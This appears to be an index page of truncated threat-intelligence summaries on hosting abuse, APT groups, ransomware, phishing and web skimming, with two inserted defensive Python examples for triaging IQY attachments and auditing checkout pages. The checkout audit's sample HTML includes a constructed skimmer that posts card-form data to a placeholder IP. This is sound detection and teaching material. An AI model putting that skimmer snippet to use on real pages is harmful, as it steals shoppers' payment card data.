All Articles (193)

Summary: King Servers is a Russian hosting firm whose servers have been involved in numerous Russian criminal and Russian APT activities over the last few years. These activities include the compromise of the Arizona and Illinois SBOE (State Board of Elections) websites in 2016, and the use of King Servers IPs as C2s for the newest Trickbot module. Wapack Labs also found that in February 2018, King Servers hosted the Emotet malicious email campaign involving denniscrawford2014[.]com. This domain


China’s Tencent Games is the developer of the mobile version of PlayerUnknown’s Battlegrounds, a vastly popular game that Wapack Labs has identified as being used to create botnets for conducting industrial fraud.  This report examines the relationship between Tencent and the Chinese government to explore the question of whether Tencent is a witting participant in this activity or being used by malicious actors in the government.

Tencent dominates the Chinese online world.  Tencent’s tex

ProxyLTE, a supplier of US-based mobile and home router proxies, has been identified as one component in a large-scale fraud targeting a Wapack Labs client. ProxyLTE was created in late 2017; however, associated malware was first observed in 2013. This report includes details on ProxyLTE malware and associated infrastructure.

Report Date: January 14, 2019


PlayerUnknown’s Battlegrounds (PUBG) has been identified by Wapack Labs as a large-scale proxy participant in major fraud. It is unclear whether PUBG is a witting or unwitting participant, but it is clear that the PUBG network has been abused for fraudulent purposes.

Wapack Labs has yet to identify the specific malware component that is responsible for recruiting PUBG gamers into various botnets. However, the


Information regarding a group of Chinese APT cyber actors stealing high value information from commercial and governmental victims in the US and abroad was recently collected and analyzed by US federal authorities.  This Chinese APT group is known within private sector reporting as APT10, Cloud Hopper, menuPass, Stone Panda, Red Apollo, CVNX and POTASSIUM.  This group heavily targets managed service providers (MSP) who offer cloud computing services; commercial and governmental clients

2019 Cyber Security Threat and Vulnerability Predictions

This report outlines our predictions regarding cyber threats and vulnerabilities for 2019.  We base these on the trends Wapack Labs observed during 2018.  The main topics are artificial intelligence, IoT and mobile, cryptocurrency cybercrime, APT activity, and eCommerce targeting.

  1. Smarter Computing: Swarm, AI and Quantum

Quantum Computing

IBM-Q allows access to its quantum computer for research and testing. Quantum computing will revolut


China has long exerted control over Internet content and access by its citizens.  The censorship regime known as the Great Firewall of China has been used to eliminate unwanted content such as criticism of Communist Party leadership.  Since Xi Jinping became president in 2013, that regime has tightened in many ways.

China’s right to control its own portion of the Internet has been defended by the government through its promotion of the concept of “cyber sovereignty.”  They e


US federal authorities assess that cyber criminals are likely using Internet Query (IQY) files in phishing emails targeting US businesses, indicating a new tactic, technique, and procedure (TTP).  IQY files are a plain-text file format that Excel uses to import data from external sources, such as remote web servers, into a spreadsheet; whatever the server returns is loaded into the workbook and processed on the user’s computer, which is what makes a malicious IQY dangerous.  In the cybercriminal phishing attempts, a malicious web server URL was put into the IQY file attached to the em
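The IQY layout described above is simple enough to triage at the mail gateway. The following is an added example, not Wapack Labs code: it parses the three fixed leading lines of an IQY file (query type, version, URL) plus the trailing Name=Value settings, and flags attachments whose URL points anywhere other than a hypothetical allowlisted internal host. The sample attachment bodies and the `intranet.example.com` allowlist are constructed for the demonstration.

```python
"""Triage .iqy mail attachments by the URL they would make Excel fetch.

Added example; the samples and the TRUSTED_HOSTS allowlist are constructed
for illustration and are not from any real campaign.
"""
from urllib.parse import urlparse

# Hypothetical allowlist of hosts that are legitimately queried from spreadsheets.
TRUSTED_HOSTS = {"intranet.example.com"}

# Constructed attachments as (filename, raw bytes) as pulled from a mail queue.
SAMPLES = [
    ("sales_report.iqy",
     b"WEB\r\n1\r\nhttp://intranet.example.com/reports/q4.csv\r\n\r\n"
     b"Selection=AllTables\r\nFormatting=None\r\n"),
    ("invoice.iqy",
     b"WEB\r\n1\r\nhttp://203.0.113.7/attach/1.dat\r\n\r\nSelection=AllTables\r\n"),
    ("notes.txt", b"just text\r\n"),
]


def parse_iqy(data):
    """Return (query_type, url, settings) for an IQY body, or None if it is not one.

    Layout: line 1 is the query type ("WEB"), line 2 the version ("1"),
    line 3 the URL; any later non-empty lines are Name=Value settings.
    """
    lines = data.decode("utf-8", errors="replace").splitlines()
    if len(lines) < 3 or lines[0].strip().upper() != "WEB":
        return None
    url = lines[2].strip()
    settings = {}
    for line in lines[3:]:
        if "=" in line:
            key, value = line.split("=", 1)
            settings[key.strip()] = value.strip()
    return lines[0].strip().upper(), url, settings


def triage(data):
    """Classify one attachment body as 'clean', 'internal-iqy' or 'suspicious-iqy'.

    The content, not the file extension, decides: Excel honours the WEB header
    regardless of what the attachment is called.
    """
    parsed = parse_iqy(data)
    if parsed is None:
        return "clean", None
    _, url, _ = parsed
    host = urlparse(url).hostname or ""
    if host in TRUSTED_HOSTS:
        return "internal-iqy", url
    return "suspicious-iqy", url


def run(samples=SAMPLES):
    """Triage every sample; returns {filename: (verdict, url)}."""
    return {name: triage(body) for name, body in samples}


if __name__ == "__main__":
    for name, (verdict, url) in run().items():
        print(f"{name}: {verdict} {url or ''}")
```

The verdict is driven by the URL host alone; in production the same parser would feed a detonation or URL-reputation step, since a host that looks benign today can be repointed after delivery.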


Meng Wanzhou, the Chief Financial Officer of Huawei Technologies, was arrested at the Vancouver Airport on 1 December 2018 at the request of US authorities.  The US seeks her extradition so that she can face charges of US sanctions violations in an American court.  After being held for ten days, Meng was released on bail and is staying in Vancouver while the extradition request is adjudicated by the Canadian government.

The Chinese government has reacted strongly to her arrest and has deploye

Below is the Executive Summary regarding the recent email bomb threats sent internationally.  Our good friends from Global Guardian shared their threat assessment for situational awareness.

Summary - On 13 December 2018, hundreds of businesses, law enforcement agencies and public services across the United States and Canada received email threats demanding a bitcoin payment of $20,000 in the early afternoon, prompting evacuations, building sweeps and overloading police call centers. What’s more,


The Wapack Labs SOC identified JexBoss exploit attempts against an HVAC controller, a NetScaler device, and the CEO of the company. This exploit is a known delivery mechanism for SamSam ransomware, and a successful attack would have been the second time this company suffered a large-scale ransomware incident.


Wapack Labs observed multiple attempts to exploit JBoss Application Servers using the JexBoss Exploit Tool starting in November 2018.  Research into these incidents shows

In a recent blog post, Nitzan Daube, CTO of NanoLock, explains why security must cover IT hardware and physical security as well as the cyber consequences that follow from neglecting them.  Wapack Labs agrees wholeheartedly, and is providing solutions.

Wapack Labs participated in a recent lecture at the October 2018 ASIS Conference, held in Las Vegas NV.  Our joint lecture specifically addressed hardware compromise, adherence to physical security and the psychology of insider threats.  Rece

The Air Force Institute of Technology[1] (AFIT) has released free “Blockchain for Supply Chain” tools for supply chain professionals to learn about and use the power of blockchain technology.  AFIT recently published a live blockchain application that can be accessed from any computer or smartphone, along with a complementary series of tutorial videos that present a blockchain simulation.  These videos can be used as a stand-alone classroom module, or the video and the blockchain website can be

Cyber security professionals often focus on dangers that appear inside their networks or within company messages, sometimes overlooking physical threats.  Laptops and devices routinely leave the confines of the network security perimeter.  In that situation an attacker can simply get physically next to a vulnerable laptop, where the firewall rules and DNS security that protect it on the corporate network no longer stand between the attacker and “your” laptop.[1]  This is why Wapack Labs strongly suggests linking physical s

This report is an update to previous Wapack Labs postings regarding the SamSam malware.  US federal authorities are providing current information about the vulnerabilities and exploits used to deploy SamSam ransomware, also known as MSIL/Samas.A.  This malware was being deployed by cyber criminals Mohammad Mehdi Shah Mansouri and Faramarz Shahi Savandi.  On 26 November 2018, the District of New Jersey indicted Mansouri and Savandi for developing and deploying SamSam ransomware.  SamSam infects w


China hosted its World Internet Conference on 7-9 November 2018 in Wuzhen, the fifth conference in this series.  As in past years, the conference was attended by Chinese political and corporate figures as well as representatives from several major Silicon Valley companies.  However, the level of foreign participation was significantly reduced from last year.  Tim Cook of Apple and Sundar Pichai of Google, featured speakers in 2017, skipped the 2018 conference.  Xi Jinping did not partici

US federal authorities have received an increase in complaints over the past three months of credit card information theft by cyber criminals using web injection to introduce skimming code on e-commerce payment card processing web pages.  Cyber criminals introduced skimming code to the payment card processing websites by gaining access to either the victim’s network or a third-party entity.  The code captured credit card data as the end user entered it in real time.  That information was exfiltr
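Skimming code injected into a checkout page typically arrives as an extra script include or an inline handler that hooks the payment form and posts field contents to a host the merchant does not control. The following is an added example, not Wapack Labs code or any real skimmer: a static audit that lists every script on a checkout page, flags script hosts outside a hypothetical first-party/CDN allowlist, flags allowed third-party scripts loaded without Subresource Integrity, and flags inline scripts that both attach a form or keystroke listener and reference a foreign URL. The HTML sample and the hostnames are constructed.

```python
"""Static audit of a checkout page for injected or unpinned scripts.

Added example; the page HTML, FIRST_PARTY and ALLOWED_THIRD_PARTY values are
constructed for illustration.
"""
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

FIRST_PARTY = "shop.example.com"          # hypothetical merchant host
ALLOWED_THIRD_PARTY = {"cdn.example.net"}  # hypothetical approved CDN

# Constructed checkout page: one pinned first-party script, one unpinned CDN
# script, one script from an unknown host, and an inline handler that posts
# the form to that same unknown host on submit.
SAMPLE_HTML = """<html><body>
<form id="checkout"><input name="cardnumber"><input name="cvv"></form>
<script src="https://shop.example.com/js/checkout.js" integrity="sha384-abc"></script>
<script src="https://cdn.example.net/lib.js"></script>
<script src="https://203.0.113.9/jquery.min.js"></script>
<script>document.getElementById('checkout').addEventListener('submit',function(){
var f=new FormData(this);fetch('https://203.0.113.9/g',{method:'POST',body:f});});</script>
</body></html>"""

URL_RE = re.compile(r"https?://[^\s'\"()]+")
HOOK_RE = re.compile(r"addEventListener\(\s*['\"](submit|keyup|keydown|input|change)['\"]")


class ScriptCollector(HTMLParser):
    """Collect external script sources (with SRI flag) and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external = []   # (src, has_integrity)
        self.inline = []     # script bodies
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        if a.get("src"):
            self.external.append((a["src"], "integrity" in a))
        else:
            self._in_inline = True
            self.inline.append("")

    def handle_data(self, data):
        if self._in_inline:
            self.inline[-1] += data   # script bodies may arrive in several chunks

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit(html):
    """Return a list of (finding, detail) tuples in document order."""
    parser = ScriptCollector()
    parser.feed(html)
    trusted = {FIRST_PARTY} | ALLOWED_THIRD_PARTY
    findings = []
    for src, pinned in parser.external:
        host = urlparse(src).hostname or ""
        if host not in trusted:
            findings.append(("unexpected-script-host", src))
        elif host != FIRST_PARTY and not pinned:
            findings.append(("missing-sri", src))
    for body in parser.inline:
        foreign = [u for u in URL_RE.findall(body)
                   if (urlparse(u).hostname or "") not in trusted]
        if foreign and HOOK_RE.search(body):
            findings.append(("inline-form-hook-to-foreign-host", foreign[0]))
    return findings


if __name__ == "__main__":
    for finding, detail in audit(SAMPLE_HTML):
        print(f"{finding}: {detail}")
```

This catches the two injection shapes the summary describes (a foreign script include and an inline hook that exfiltrates on submit) but only on the HTML as served; a script that is loaded legitimately and later modified at its origin will pass the host check and is only caught by the SRI pin, which is why the audit treats a missing `integrity` attribute on third-party scripts as a finding in its own right.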

The US Department of Homeland Security (DHS) Cyber Intelligence Network (CIN) is aware of a Thanksgiving Day-themed phishing email campaign with at least two variants targeting US government entities.  The campaign began on 19 November 2018, and the phishing emails include Thanksgiving Day-themed subject lines with holiday-themed document titles.  The emails spoof legitimate government senders and attempt to deliver malware to legitimate government entities.  The reported agencies that have b

Wapack Labs has identified 699 unique IP addresses believed to be infected by, or associated with the possible delivery of, Black Energy.  Some of these connections carried an href user agent (pointing at another location); others appeared infected with Black Energy and were identified checking into our Black Energy sinkholes.  Black Energy, as you may recall, was used against Ukraine on 23 December 2015 in coordinated attacks against multiple regional power distribution companies in Ivano-Fran


On 10 October 2018, the FBI announced the arrest of Xu Yanjun, a Chinese intelligence agent who had been targeting an employee of GE Aviation to acquire trade secrets on the company’s jet engines.  The target employee had cooperated with the FBI during this operation, and when Xu arranged a meeting with the employee in Europe in April 2018, Xu was arrested.  He was extradited from Belgium to the United States in October and charged with economic espionage.  Details in the indictment issued